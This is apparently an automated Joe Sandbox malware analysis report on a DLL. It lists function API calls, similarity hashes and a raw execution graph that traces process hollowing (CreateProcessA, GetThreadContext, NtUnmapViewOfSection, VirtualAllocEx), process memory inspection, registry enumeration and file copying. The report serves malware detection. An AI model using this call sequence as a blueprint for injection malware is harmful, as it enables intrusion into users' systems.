    • Instruction Fuzzy Hash: 48C139377849044AF320E668BC41BFFB781E7D13F2F50053BEA05CA1D4D96BA949CA66
    Uniqueness

    Uniqueness Score: -1.00%

    Function 1000C440 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 97COMMON
    Download Yara Rule
    APIs
    • SHGetSpecialFolderPathA.SHELL32(00000000,00000000,?,00000000), ref: 1000C4CB
    • GetWindowsDirectoryA.KERNEL32(00000000,00000104), ref: 1000C4EA
    • GetSystemDirectoryA.KERNEL32(00000000,00000104), ref: 1000C501
    • GetTempPathA.KERNEL32(00000104,00000000), ref: 1000C518
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.336193298.0000000010000000.00000040.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
    Similarity
    • API ID: DirectoryPath$FolderSpecialSystemTempWindows
    • String ID: \$\
    • API String ID: 2721284240-164819647
    • Opcode ID: 9b90a25063b9e1c39bff7ddda37614abe361fa60ecb1f47f8ab911e9c3895cb3
    • Instruction ID: 77cbe7fce8ef9562389d15453b58eba8ebe27cca9de610a2ae966a0e19f657af
    • Opcode Fuzzy Hash: 9b90a25063b9e1c39bff7ddda37614abe361fa60ecb1f47f8ab911e9c3895cb3
    • Instruction Fuzzy Hash: 7F3103B550874A9BF720C728CC95F6E36D0E7417C0F20891AF585C60D9E6B4E88097A2
    Uniqueness

    Uniqueness Score: -1.00%

    Function 1000A370 Relevance: 7.7, APIs: 6, Instructions: 208COMMON
    Download Yara Rule
    Memory Dump Source
    • Source File: 00000003.00000002.336193298.0000000010000000.00000040.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 60cd75bbc9cd8ca24744c5fda6e17e72869eac0f45f0e376a98c2c6226a09f87
    • Instruction ID: 997e975f8056afc4703edd2e8b222d0f39c38b45864d1c521b5624a5b2537b3b
    • Opcode Fuzzy Hash: 60cd75bbc9cd8ca24744c5fda6e17e72869eac0f45f0e376a98c2c6226a09f87
    • Instruction Fuzzy Hash: 69514A756046054BF738C6248C42AEF73D5EBC23A0F248B2DFA55C31D8EE7AD9858392
    Uniqueness

    Uniqueness Score: -1.00%

    Function 1000BAB0 Relevance: 6.1, APIs: 4, Instructions: 87COMMON
    Download Yara Rule
    APIs
    • malloc.MSVCRT ref: 1000BB13
    • LCMapStringA.KERNEL32(00000804,00400000,?,?,00000000,?,?,?,100695CA,?,00000000,00000000,?,10009E2B,00000001,00000000), ref: 1000BB47
    • ??3@YAXPAX@Z.MSVCRT ref: 1000BB56
    • ??3@YAXPAX@Z.MSVCRT ref: 1000BB74
    Memory Dump Source
    • Source File: 00000003.00000002.336193298.0000000010000000.00000040.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
    Similarity
    • API ID: ??3@$Stringmalloc
    • String ID:
    • API String ID: 1006641717-0
    • Opcode ID: 6a2a28c6ebfc604dd3311785f4f21d4eed50436354b036f7b997f2173f3be702
    • Instruction ID: c44458945b11d331972013727580eba0770bfaca40fb43e82456e2fbb398e2da
    • Opcode Fuzzy Hash: 6a2a28c6ebfc604dd3311785f4f21d4eed50436354b036f7b997f2173f3be702
    • Instruction Fuzzy Hash: ED1105762046043BE218DA799C42E6B73CADBC42A1F10462DF226922C5DE72ED054765
    Uniqueness

    Uniqueness Score: -1.00%

    Execution Graph

    Execution Coverage:15.5%
    Dynamic/Decrypted Code Coverage:1.6%
    Signature Coverage:0%
    Total number of Nodes:764
    Total number of Limit Nodes:19
    execution_graph 6279 1000ae00 6280 1000b1f2 6279->6280 6281 1000ae19 6279->6281 6282 1000b2e8 wsprintfA MessageBoxA 6280->6282 6284 1000b244 6280->6284 6285 1000b225 6280->6285 6286 1000b2b7 6280->6286 6287 1000b208 6280->6287 6288 1000b269 wsprintfA MessageBoxA 6280->6288 6325 1000aec0 6280->6325 6283 1000ae1f 6281->6283 6309 1000b13b 6281->6309 6282->6325 6289 1000b034 6283->6289 6290 1000ae2a 6283->6290 6345 10009480 6284->6345 6296 100094c0 3 API calls 6285->6296 6299 10009390 ExitProcess 6286->6299 6293 10009430 4 API calls 6287->6293 6298 10009390 ExitProcess 6288->6298 6291 1000b042 6289->6291 6292 1000b0fd GetModuleFileNameA 6289->6292 6294 1000ae30 6290->6294 6295 1000aff4 GetCommandLineA 6290->6295 6300 1000b0c3 GetModuleFileNameA 6291->6300 6301 1000b045 6291->6301 6307 1000b117 strrchr 6292->6307 6292->6325 6302 1000b215 6293->6302 6303 1000af95 6294->6303 6304 1000ae3b 6294->6304 6295->6325 6305 1000b232 6296->6305 6308 1000b2a5 6298->6308 6310 1000b2c4 6299->6310 6315 1000b0dd strrchr 6300->6315 6300->6325 6301->6282 6312 1000b04e PeekMessageA 6301->6312 6303->6282 6316 1000afa0 6303->6316 6313 1000ae72 GetModuleFileNameA 6304->6313 6314 1000ae3d 6304->6314 6306 1000b259 6309->6282 6309->6284 6309->6285 6309->6286 6309->6287 6309->6288 6317 1000b18c 6309->6317 6322 1000b16d 6309->6322 6309->6325 6319 1000b06b 6312->6319 6312->6325 6321 1000ae88 strrchr 6313->6321 6313->6325 6314->6282 6320 1000ae4e 6314->6320 6323 1000afe0 _ftol 6316->6323 6324 1000afc0 6316->6324 6316->6325 6317->6325 6337 100094c0 6317->6337 6319->6325 6326 1000b088 GetMessageA TranslateMessage DispatchMessageA PeekMessageA 6319->6326 6321->6325 6331 1000be80 6322->6331 6324->6325 6328 1000afcc _ftol 6324->6328 6326->6319 6329 1000b0b6 6326->6329 6332 1000be9b 6331->6332 6333 1000becb 6332->6333 6335 100094c0 3 API calls 6332->6335 6334 100094c0 3 API calls 6333->6334 6336 1000b17a 6334->6336 6335->6332 6338 10009506 6337->6338 6339 100094cd 6337->6339 6340 100094d6 6339->6340 6341 100094db 6339->6341 6343 10009360 GetModuleHandleA 6340->6343 6341->6338 6342 100094eb IsBadHugeReadPtr 6341->6342 6342->6338 6344 100094f8 RtlFreeHeap 6342->6344 6343->6341 6344->6338 6346 10009494 6345->6346 6347 10009489 GetProcessHeap 6345->6347 6348 100094ac RtlAllocateHeap 6346->6348 6349 1000949c RtlReAllocateHeap 6346->6349 6347->6346 6348->6306 6349->6306 6350 10009205 6353 1000b390 GetModuleHandleA 6350->6353 6352 10009214 6352->6352 6354 1000b40b 6353->6354 6355 1000b3ae LoadLibraryA 6353->6355 6357 1000b427 strchr 6354->6357 6358 1000b417 atoi 6354->6358 6356 1000b3bb wsprintfA MessageBoxA 6355->6356 6360 1000b3e8 6355->6360 6359 10009390 ExitProcess 6356->6359 6362 1000b45f 6357->6362 6361 1000b46f GetProcAddress 6358->6361 6359->6360 6360->6354 6363 1000b4c6 6361->6363 6364 1000b47d wsprintfA MessageBoxA 6361->6364 6362->6361 6363->6352 6365 10009390 ExitProcess 6364->6365 6366 1000b4ab 6365->6366 6366->6352 6367 10004606 6368 10004633 6367->6368 6408 10005d6f GetEnvironmentVariableA 6368->6408 6370 1000464d 6371 10004786 CreateProcessA 6370->6371 6372 1000487e 6371->6372 6373 100049a4 GetThreadContext 6372->6373 6394 1000496f 6372->6394 6374 10004b18 6373->6374 6375 10009520 5 API calls 6374->6375 6376 10004bcb 6375->6376 6377 10004ccd 6376->6377 6378 10004cdf 6376->6378 6412 10005e5f TerminateProcess 6377->6412 6380 10004d24 ReadProcessMemory 6378->6380 6381 10004d39 6380->6381 6382 10004d50 6381->6382 6383 10004d62 NtUnmapViewOfSection 6381->6383 6384 10005e5f 3 API calls 6382->6384 6385 10004d85 6383->6385 6384->6394 6386 10004db1 VirtualAllocEx 6385->6386 6387 10004d9f 6385->6387 6389 10004dfc 6386->6389 6388 10005e5f 3 API calls 6387->6388 6388->6394 6390 10004e16 6389->6390 6392 10004e28 6389->6392 6391 10005e5f 3 API calls 6390->6391 6391->6394 6393 10005084 LocalSize 6392->6393 6407 1000509b 6393->6407 6395 100057c5 6396 10009520 5 API calls 6395->6396 6397 10005aab 6396->6397 6398 10005bd9 WaitForSingleObject 6397->6398 6399 10005bfd 6397->6399 6398->6399 6399->6394 6401 10005c14 CloseHandle 6399->6401 6400 10009520 GetModuleHandleA ExitProcess GetProcessHeap RtlAllocateHeap MessageBoxA 6400->6407 6402 10005c43 CloseHandle 6401->6402 6403 10005c36 6401->6403 6402->6394 6403->6402 6405 10005660 6406 10005e5f 3 API calls 6405->6406 6406->6394 6407->6395 6407->6400 6407->6405 6418 10005f47 6407->6418 6409 10005da7 6408->6409 6410 10005dfb GetEnvironmentVariableA 6409->6410 6411 10005e1b 6410->6411 6411->6370 6413 10005e99 CloseHandle 6412->6413 6414 10005e8c 6412->6414 6415 10005ec8 CloseHandle 6413->6415 6416 10005ebb 6413->6416 6414->6413 6417 10005ee7 6415->6417 6416->6415 6417->6394 6419 10005f69 6418->6419 6420 10005fcc lstrcpyn 6419->6420 6423 10005fa1 6419->6423 6421 10005fdc 6420->6421 6422 1000600e RtlMoveMemory 6421->6422 6422->6423 6423->6407 6424 10008e08 6427 10007548 6424->6427 6431 1000754b 6427->6431 6433 1000757e 6431->6433 6446 10007779 6431->6446 6469 10007ffc 6431->6469 6486 1000a7a0 Sleep 6431->6486 6487 100024e3 6433->6487 6435 1000759f 6493 1000a7b0 6435->6493 6437 100075e7 6438 100024e3 4 API calls 6437->6438 6445 10007744 6437->6445 6439 1000763f 6438->6439 6511 1000a760 PathFileExistsA 6439->6511 6441 100076b3 6441->6445 6512 1000300a 6441->6512 6443 10007715 6520 10009710 SetFileAttributesA 6443->6520 6445->6431 6447 100024e3 4 API calls 6446->6447 6448 100077d9 6447->6448 6536 10009660 6448->6536 6450 100078ea 6451 100024e3 4 API calls 6450->6451 6452 10007919 6451->6452 6453 100024e3 4 API calls 6452->6453 6455 10007955 6453->6455 6454 100024e3 4 API calls 6456 10007991 6454->6456 6455->6454 6457 100024e3 4 API calls 6456->6457 6467 100079cd 6457->6467 6458 100079f8 RegEnumKeyA 6458->6467 6459 100024e3 ExitProcess GetProcessHeap RtlAllocateHeap MessageBoxA 6459->6467 6460 10007e76 6460->6431 6461 1000a7b0 15 API calls 6461->6467 6463 10009d80 ExitProcess GetProcessHeap RtlAllocateHeap MessageBoxA 6463->6467 6466 1000300a 3 API calls 6466->6467 6467->6458 6467->6459 6467->6460 6467->6461 6467->6463 6467->6466 6541 1000a950 6467->6541 6563 1000a6f0 6467->6563 6568 1000a760 PathFileExistsA 6467->6568 6569 10009710 SetFileAttributesA 6467->6569 6470 10008016 6469->6470 6471 10008037 CreateToolhelp32Snapshot 6470->6471 6472 100080a5 6471->6472 6473 10009520 5 API calls 6472->6473 6475 100080bf 6472->6475 6474 100081f5 6473->6474 6476 100024e3 4 API calls 6474->6476 6475->6431 6484 1000824f 6476->6484 6477 100086dd CloseHandle 6477->6475 6480 10009520 5 API calls 6480->6484 6483 1000300a 3 API calls 6483->6484 6484->6477 6484->6480 6484->6483 6622 1000a370 6484->6622 6649 10008779 6484->6649 6669 10009d80 6484->6669 6674 1000a760 PathFileExistsA 6484->6674 6675 10009710 SetFileAttributesA 6484->6675 6486->6431 6488 10002528 6487->6488 6521 100097e0 6488->6521 6490 10002768 6490->6435 6492 1000261c 6492->6490 6526 10009830 6492->6526 6494 1000a7c1 6493->6494 6496 1000a7ec ??2@YAPAXI strrchr 6494->6496 6497 1000a8fe 6494->6497 6495 1000a93a 6495->6437 6498 1000a825 6496->6498 6499 1000a829 RegOpenKeyA 6496->6499 6497->6495 6500 1000b990 4 API calls 6497->6500 6498->6499 6501 1000a8ed ??3@YAXPAX 6499->6501 6502 1000a83e ??2@YAPAXI RegQueryValueExA 6499->6502 6504 1000a923 6500->6504 6501->6497 6503 1000a92e 6501->6503 6505 1000a8b1 6502->6505 6506 1000a87c 6502->6506 6503->6437 6504->6437 6508 1000a8d9 ??3@YAXPAX RegCloseKey 6505->6508 6509 1000b990 4 API calls 6505->6509 6507 1000a883 ??3@YAXPAX ??2@YAPAXI RegQueryValueExA 6506->6507 6506->6508 6507->6505 6507->6506 6508->6501 6510 1000a8d2 6509->6510 6510->6508 6511->6441 6513 10003024 6512->6513 6514 1000304a CreateFileA 6513->6514 6515 1000309c 6514->6515 6516 1000324a WriteFile 6515->6516 6517 1000326a FindCloseChangeNotification 6516->6517 6518 1000325d 6516->6518 6519 1000327f 6517->6519 6518->6517 6519->6443 6520->6445 6522 1000982b 6521->6522 6523 100097ea 6521->6523 6522->6492 6523->6522 6531 1000b500 6523->6531 6525 10009825 6525->6492 6527 10009839 6526->6527 6528 1000983d 6526->6528 6527->6492 6529 10009430 4 API calls 6528->6529 6530 10009844 6529->6530 6530->6492 6532 1000b509 6531->6532 6533 1000b50d 6531->6533 6532->6525 6534 10009430 4 API calls 6533->6534 6535 1000b517 6534->6535 6535->6525 6537 10009669 6536->6537 6538 1000966d 6536->6538 6537->6450 6539 10009430 4 API calls 6538->6539 6540 10009678 6539->6540 6540->6450 6542 1000a981 6541->6542 6546 1000a989 6541->6546 6542->6467 6543 1000ab52 6580 1000b9d0 6543->6580 6545 1000ab58 6545->6467 6546->6543 6547 1000aa0d 6546->6547 6557 1000aa93 6547->6557 6558 1000aa30 6547->6558 6548 1000aa38 _strncoll 6548->6558 6549 1000aa97 _strnicmp 6549->6557 6550 1000ab12 6551 1000b990 4 API calls 6550->6551 6554 1000ab29 6551->6554 6552 1000b810 8 API calls 6552->6557 6553 1000b810 8 API calls 6553->6558 6577 1000b740 6554->6577 6555 1000aa91 6555->6550 6570 1000b810 6555->6570 6557->6549 6557->6552 6557->6555 6558->6548 6558->6553 6558->6555 6561 1000b740 2 API calls 6562 1000ab48 6561->6562 6562->6467 6564 1000a751 6563->6564 6565 1000a705 6563->6565 6564->6467 6565->6564 6566 10009430 4 API calls 6565->6566 6567 1000a728 6566->6567 6567->6467 6568->6467 6569->6467 6571 1000b81a 6570->6571 6574 1000b82a 6570->6574 6585 1000b630 6571->6585 6573 1000b826 6573->6574 6602 1000b870 6573->6602 6574->6550 6576 1000b841 6576->6550 6578 1000b760 2 API calls 6577->6578 6579 1000ab37 6578->6579 6579->6561 6581 1000ba14 6580->6581 6582 1000b9d9 6580->6582 6581->6545 6582->6581 6583 10009430 4 API calls 6582->6583 6584 1000b9f7 6583->6584 6584->6545 6586 1000b64a 6585->6586 6587 1000b63d 6585->6587 6588 1000b651 6586->6588 6593 1000b65f 6586->6593 6589 1000b740 2 API calls 6587->6589 6607 1000b560 6588->6607 6591 1000b642 6589->6591 6591->6573 6592 1000b659 6592->6573 6594 1000b692 6593->6594 6595 1000b6a4 GetProcessHeap 6593->6595 6596 1000b6af 6593->6596 6594->6573 6595->6596 6597 1000b712 RtlReAllocateHeap 6596->6597 6598 1000b6b4 RtlAllocateHeap 6596->6598 6597->6591 6598->6591 6599 1000b6d0 6598->6599 6616 1000b760 6599->6616 6601 1000b6f8 6601->6573 6603 1000b8c3 6602->6603 6604 1000b878 6602->6604 6603->6576 6605 1000b87d 6604->6605 6606 1000b8b0 memmove 6604->6606 6605->6576 6606->6603 6608 1000b56c 6607->6608 6611 1000b57c 6607->6611 6609 1000b630 5 API calls 6608->6609 6610 1000b576 6609->6610 6610->6592 6612 1000b5fa RtlAllocateHeap 6611->6612 6613 1000b5ef GetProcessHeap 6611->6613 6615 1000b584 6611->6615 6614 1000b611 6612->6614 6613->6612 6614->6592 6615->6592 6617 1000b76a 6616->6617 6618 1000b7be 6616->6618 6619 1000b77e 6617->6619 6620 1000b7b4 HeapFree 6617->6620 6621 1000b7a9 GetProcessHeap 6617->6621 6618->6601 6619->6601 6620->6618 6621->6620 6623 1000a3f8 6622->6623 6630 1000a38f 6622->6630 6624 1000a403 6623->6624 6625 1000a4f4 6623->6625 6626 1000a409 6624->6626 6627 1000a4cf sprintf 6624->6627 6628 1000a572 6625->6628 6629 1000a4fb 6625->6629 6636 1000a497 6626->6636 6637 1000a479 6626->6637 6638 1000a50f sprintf 6626->6638 6646 1000a41e 6626->6646 6648 1000a5f4 6626->6648 6627->6646 6633 1000a579 6628->6633 6634 1000a5aa sprintf 6628->6634 6631 1000a4fd 6629->6631 6632 1000a54e sprintf 6629->6632 6630->6648 6676 1000a300 6630->6676 6639 1000a504 6631->6639 6640 1000a52e sprintf 6631->6640 6632->6646 6641 1000a584 sprintf 6633->6641 6633->6648 6634->6646 6681 1000bc30 modf 6636->6681 6644 1000a300 4 API calls 6637->6644 6638->6646 6639->6638 6639->6648 6640->6646 6641->6646 6643 1000a3e9 6643->6484 6645 1000a488 6644->6645 6645->6484 6647 10009430 4 API calls 6646->6647 6646->6648 6647->6648 6648->6484 6650 10008793 6649->6650 6651 100087c5 OpenProcess 6650->6651 6653 10008805 6651->6653 6695 10009bf0 6653->6695 6654 1000886b 6700 1000ac70 6654->6700 6656 10008922 6657 1000ac70 6 API calls 6656->6657 6661 10008a22 6657->6661 6658 10008a91 VirtualQueryEx 6659 10008ab4 6658->6659 6660 10009bf0 4 API calls 6659->6660 6662 10008b1c 6660->6662 6661->6658 6706 10008c8b 6662->6706 6664 10008b82 6714 1000a640 6664->6714 6666 10008bde 6667 10009d80 4 API calls 6666->6667 6668 10008c0c 6667->6668 6668->6484 6670 10009d97 6669->6670 6671 10009dcb 6669->6671 6670->6671 6672 10009430 4 API calls 6670->6672 6671->6484 6673 10009dae 6672->6673 6673->6484 6674->6484 6675->6484 6678 1000a311 6676->6678 6677 1000a31e 6677->6643 6678->6677 6679 10009430 4 API calls 6678->6679 6680 1000a34a 6679->6680 6680->6643 6687 1000c220 _ftol 6681->6687 6683 1000bc73 6688 1000c0a0 6683->6688 6685 1000bc91 sprintf 6685->6646 6687->6683 6689 1000c1f5 _ftol 6688->6689 6690 1000c0b9 6688->6690 6689->6685 6690->6689 6691 1000c0ca 6690->6691 6692 1000c0e0 _ftol 6691->6692 6693 1000c0f3 _ftol 6691->6693 6694 1000c104 6692->6694 6693->6694 6694->6685 6696 10009bf9 6695->6696 6697 10009bfd 6695->6697 6696->6654 6698 10009430 4 API calls 6697->6698 6699 10009c06 6698->6699 6699->6654 6701 1000ac80 6700->6701 6703 1000ac8c 6701->6703 6722 100093d0 6701->6722 6705 1000ad16 6703->6705 6727 1000ab70 6703->6727 6705->6656 6736 100095a0 6706->6736 6709 10008cfe 6710 10009660 4 API calls 6709->6710 6711 10008d27 6710->6711 6712 10008d88 WideCharToMultiByte 6711->6712 6713 10008dc2 6712->6713 6713->6664 6715 1000a66a 6714->6715 6721 1000a6b3 6714->6721 6716 1000a6bb 6715->6716 6717 1000a69b 6715->6717 6715->6721 6719 1000a6bf _strncoll 6716->6719 6716->6721 6718 1000a69f _strnicmp 6717->6718 6717->6721 6718->6717 6720 1000a6db 6718->6720 6719->6716 6719->6720 6720->6666 6721->6666 6723 100093e0 6722->6723 6724 100093ec wsprintfA MessageBoxA 6722->6724 6723->6724 6725 10009390 ExitProcess 6724->6725 6726 1000941c 6725->6726 6726->6703 6728 1000ab83 6727->6728 6729 1000ab9a 6727->6729 6728->6729 6730 1000abe7 6728->6730 6733 1000abba 6728->6733 6729->6705 6731 1000b500 4 API calls 6730->6731 6732 1000abf6 6731->6732 6732->6705 6734 1000b990 4 API calls 6733->6734 6735 1000abde 6734->6735 6735->6705 6737 10008cc0 WideCharToMultiByte 6736->6737 6737->6709 6142 1000b390 GetModuleHandleA 6143 1000b40b 6142->6143 6144 1000b3ae LoadLibraryA 6142->6144 6146 1000b427 strchr 6143->6146 6147 1000b417 atoi 6143->6147 6145 1000b3bb wsprintfA MessageBoxA 6144->6145 6149 1000b3e8 6144->6149 6148 10009390 ExitProcess 6145->6148 6151 1000b45f 6146->6151 6150 1000b46f GetProcAddress 6147->6150 6148->6149 6149->6143 6152 1000b4c6 6150->6152 6153 1000b47d wsprintfA MessageBoxA 6150->6153 6151->6150 6156 10009390 6153->6156 6157 10009398 6156->6157 6158 100093a1 ExitProcess 6157->6158 6159 100093ad 6157->6159 6785 10009a10 6786 10009a18 6785->6786 6787 10009a28 6786->6787 6788 10009a1f ??3@YAXPAX 6786->6788 6788->6787 6836 10009320 GetProcessHeap 6837 100095e0 6836->6837 7186 10008fae 7187 1000b390 10 API calls 7186->7187 7188 10008fc2 7187->7188 7188->7188 6160 1000a7b0 6161 1000a7c1 6160->6161 6163 1000a7ec ??2@YAPAXI strrchr 6161->6163 6164 1000a8fe 6161->6164 6162 1000a93a 6165 1000a825 6163->6165 6166 1000a829 RegOpenKeyA 6163->6166 6164->6162 6167 1000b990 4 API calls 6164->6167 6165->6166 6168 1000a8ed ??3@YAXPAX 6166->6168 6169 1000a83e ??2@YAPAXI RegQueryValueExA 6166->6169 6171 1000a923 6167->6171 6168->6164 6170 1000a92e 6168->6170 6172 1000a8b1 6169->6172 6173 1000a87c 6169->6173 6175 1000a8d9 ??3@YAXPAX RegCloseKey 6172->6175 6178 1000b990 6172->6178 6174 1000a883 ??3@YAXPAX ??2@YAPAXI RegQueryValueExA 6173->6174 6173->6175 6174->6172 6174->6173 6175->6168 6177 1000a8d2 6177->6175 6179 1000b999 6178->6179 6180 1000b99d 6178->6180 6179->6177 6183 10009430 6180->6183 6184 10009444 RtlAllocateHeap 6183->6184 6185 10009439 GetProcessHeap 6183->6185 6186 10009459 MessageBoxA 6184->6186 6188 10009472 6184->6188 6185->6184 6187 10009390 ExitProcess 6186->6187 6187->6188 6188->6177 6932 1000753c 6935 100061d0 6932->6935 6936 100024e3 4 API calls 6935->6936 6938 100061ea 6936->6938 6937 1000621a EnumWindows 6937->6938 6939 1000751d 6937->6939 6938->6937 6942 10006272 6939->6942 6941 10007536 6943 1000629a 6942->6943 6966 100065cf 6943->6966 6945 100062b3 6946 100024e3 4 API calls 6945->6946 6947 100062df 6946->6947 6948 10006329 GetWindowThreadProcessId 6947->6948 6953 10006564 6947->6953 6949 10006342 6948->6949 6950 1000634f GetCurrentProcessId 6948->6950 6949->6950 6951 10006361 6950->6951 6951->6953 6971 1000667b 6951->6971 6953->6941 6954 1000637f 6977 10009850 6954->6977 6956 100063cf 6956->6953 6957 100024e3 4 API calls 6956->6957 6958 1000646e 6957->6958 6990 10009a40 6958->6990 6960 100064cc 6960->6953 6998 10009b10 6960->6998 6962 10006537 7003 1000676c 6962->7003 6964 1000655f 7019 1000728d 6964->7019 6967 10009660 4 API calls 6966->6967 6968 100065fa 6967->6968 6969 10006614 GetClassNameA 6968->6969 6970 10006635 6969->6970 6970->6945 6972 1000669e 6971->6972 6973 10009660 4 API calls 6972->6973 6974 100066ed 6973->6974 6975 10006707 GetWindowTextA 6974->6975 6976 10006726 6975->6976 6976->6954 6988 1000985b 6977->6988 6978 1000997a 6979 10009430 4 API calls 6978->6979 6980 1000998d 6979->6980 6981 1000b740 2 API calls 6980->6981 6982 100099d4 6981->6982 6982->6956 6983 100098e2 6983->6978 6984 1000b9d0 4 API calls 6983->6984 6985 1000996d 6984->6985 6987 1000b7d0 8 API calls 6985->6987 6986 1000b990 4 API calls 6986->6988 6987->6978 6988->6978 6988->6983 6988->6986 7034 1000b7d0 6988->7034 6991 10009a68 6990->6991 6997 10009ac3 6990->6997 6995 10009a9d 6991->6995 6996 10009acb 6991->6996 6991->6997 6992 10009aa1 _strnicmp 6994 10009af9 6992->6994 6992->6995 6993 10009acf _strncoll 6993->6994 6993->6996 6994->6960 6995->6992 6995->6997 6996->6993 6996->6997 6997->6960 7039 1000ba20 6998->7039 7000 10009b31 7001 100094c0 3 API calls 7000->7001 7002 10009b3a 7000->7002 7001->7002 7002->6962 7005 10006775 7003->7005 7006 100067ba 7005->7006 7047 100068f2 VirtualProtect 7005->7047 7010 1000680c 7006->7010 7049 10006984 7006->7049 7008 100024e3 4 API calls 7009 1000683d 7008->7009 7054 10006af4 7009->7054 7010->7008 7012 1000686a 7013 100068f2 VirtualProtect 7012->7013 7014 1000689a 7013->7014 7015 100068f2 VirtualProtect 7014->7015 7016 100068aa 7015->7016 7066 10009ba0 7016->7066 7018 100068cb 7018->6964 7115 10002d31 7019->7115 7021 100072a7 7022 1000a640 2 API calls 7021->7022 7023 10007315 7022->7023 7024 1000a6f0 4 API calls 7023->7024 7025 10007365 7024->7025 7026 10009b10 8 API calls 7025->7026 7027 100073a8 7026->7027 7123 1000a760 PathFileExistsA 7027->7123 7029 10007412 7030 10007479 7029->7030 7124 1000a770 DeleteFileA 7029->7124 7125 1000a780 CopyFileA 7030->7125 7033 100074e9 7033->6953 7035 1000b7f5 7034->7035 7036 1000b7dd 7034->7036 7037 1000b810 8 API calls 7035->7037 7036->6988 7038 1000b801 7037->7038 7038->6988 7040 1000ba37 7039->7040 7042 1000ba3b 7039->7042 7040->7000 7041 1000ba46 _strncoll 7041->7042 7044 1000ba6d 7041->7044 7042->7041 7042->7044 7043 1000ba7b 7043->7000 7044->7043 7045 10009430 4 API calls 7044->7045 7046 1000ba86 7045->7046 7046->7000 7048 1000692d 7047->7048 7048->7005 7050 100069a1 7049->7050 7051 100069ab VirtualProtect 7049->7051 7050->7010 7052 100069d4 7051->7052 7053 10009bf0 4 API calls 7052->7053 7053->7050 7055 10006b38 7054->7055 7071 10009c20 7055->7071 7057 10006bf9 7082 10009d50 7057->7082 7059 10009d80 4 API calls 7065 10006c6f 7059->7065 7060 10006c97 7060->7012 7062 1000a030 ExitProcess GetProcessHeap RtlAllocateHeap MessageBoxA 7062->7065 7064 10009de0 25 API calls 7064->7065 7065->7059 7065->7060 7065->7062 7065->7064 7086 1000703e 7065->7086 7094 1000a110 7065->7094 7067 10009bb4 7066->7067 7068 10009bb7 7066->7068 7067->7018 7069 10009430 4 API calls 7068->7069 7070 10009bbe 7069->7070 7070->7018 7072 10009c43 7071->7072 7073 10009c3d 7071->7073 7074 10009430 4 API calls 7072->7074 7073->7057 7081 10009c4d 7074->7081 7075 10009cee 7076 10009d0f 7075->7076 7078 100094c0 3 API calls 7075->7078 7076->7057 7077 10009c6a _strncoll 7077->7081 7078->7076 7079 10009c9b _strncoll 7079->7081 7080 10009cca strncpy 7080->7081 7081->7075 7081->7077 7081->7079 7081->7080 7083 10009d76 7082->7083 7084 10009d5b 7082->7084 7083->7065 7085 10009d63 _CIfmod 7084->7085 7085->7083 7085->7085 7092 10007072 7086->7092 7087 10007215 7089 1000a370 16 API calls 7087->7089 7090 1000724b 7087->7090 7089->7090 7090->7065 7091 10009a40 2 API calls 7091->7092 7092->7087 7092->7091 7109 1000a270 7092->7109 7114 1000a2e0 _CIpow 7092->7114 7095 1000a128 7094->7095 7096 1000a15d 7094->7096 7097 1000a130 7095->7097 7100 1000b990 4 API calls 7095->7100 7098 1000a253 7096->7098 7103 1000a175 7096->7103 7097->7065 7099 1000b990 4 API calls 7098->7099 7101 1000a25a 7099->7101 7102 1000a155 7100->7102 7101->7065 7102->7065 7104 10009430 4 API calls 7103->7104 7105 1000a1b9 7104->7105 7106 1000a1c3 strncpy 7105->7106 7107 1000a1dd strncpy 7105->7107 7108 1000a1d9 7106->7108 7107->7108 7108->7065 7110 1000a2d1 7109->7110 7111 1000a286 7109->7111 7110->7092 7111->7110 7112 10009430 4 API calls 7111->7112 7113 1000a2af 7112->7113 7113->7092 7114->7092 7116 10008f42 7115->7116 7117 10002d44 PathIsDirectoryA 7116->7117 7118 10002d81 7117->7118 7119 10009850 12 API calls 7118->7119 7120 10002d96 7118->7120 7121 10002dd7 7119->7121 7120->7021 7121->7120 7122 10002f3c PathIsDirectoryA 7121->7122 7122->7121 7123->7029 7124->7030 7125->7033 6189 100094c0 6190 10009506 6189->6190 6191 100094cd 6189->6191 6192 100094d6 6191->6192 6193 100094db 6191->6193 6197 10009360 6192->6197 6193->6190 6194 100094eb IsBadHugeReadPtr 6193->6194 6194->6190 6196 100094f8 RtlFreeHeap 6194->6196 6196->6190 6198 10009370 6197->6198 6199 10009369 GetModuleHandleA 6197->6199 6198->6193 6199->6198 7126 1000c440 7127 1000c467 7126->7127 7128 1000c4db 7126->7128 7127->7128 7136 1000c46c SHGetSpecialFolderPathA 7127->7136 7129 1000c4e0 GetWindowsDirectoryA 7128->7129 7130 1000c4f2 7128->7130 7135 1000c4d9 7129->7135 7131 1000c4f7 GetSystemDirectoryA 7130->7131 7132 1000c509 7130->7132 7131->7135 7134 1000c50e GetTempPathA 7132->7134 7132->7135 7134->7135 7136->7135 6265 1008354a 6267 10083555 6265->6267 6268 10083569 6267->6268 6269 1008357b VirtualAlloc 6267->6269 6268->6269 6272 100837bd 6268->6272 6270 100835b7 6269->6270 6269->6272 6273 100835c2 6270->6273 6274 100835d1 6273->6274 6275 10083632 VirtualFree 6274->6275 6277 1008365a 6275->6277 6276 1008379e VirtualProtect 6276->6276 6278 100837bd 6276->6278 6277->6276 6277->6278 6278->6272 6200 1000b4e0 6203 10008f24 6200->6203 6204 10008f2c 6203->6204 6209 10001027 6204->6209 6206 10008f31 6217 100013d3 6206->6217 6208 10008f36 6210 1000103a 6209->6210 6211 100010d6 WSAStartup 6210->6211 6212 10001157 6211->6212 6254 10009520 6212->6254 6214 10001190 6215 10009520 5 API calls 6214->6215 6216 100011db 6215->6216 6216->6206 6261 100017ab 6217->6261 6219 100013e1 6220 10009660 ExitProcess GetProcessHeap RtlAllocateHeap MessageBoxA 6219->6220 6221 10001401 6220->6221 6222 1000141e GetModuleFileNameA 6221->6222 6223 10001447 6222->6223 6224 10001817 16 API calls 6223->6224 6225 10001464 6224->6225 6226 100096a0 8 API calls 6225->6226 6227 10001489 6226->6227 6228 10009710 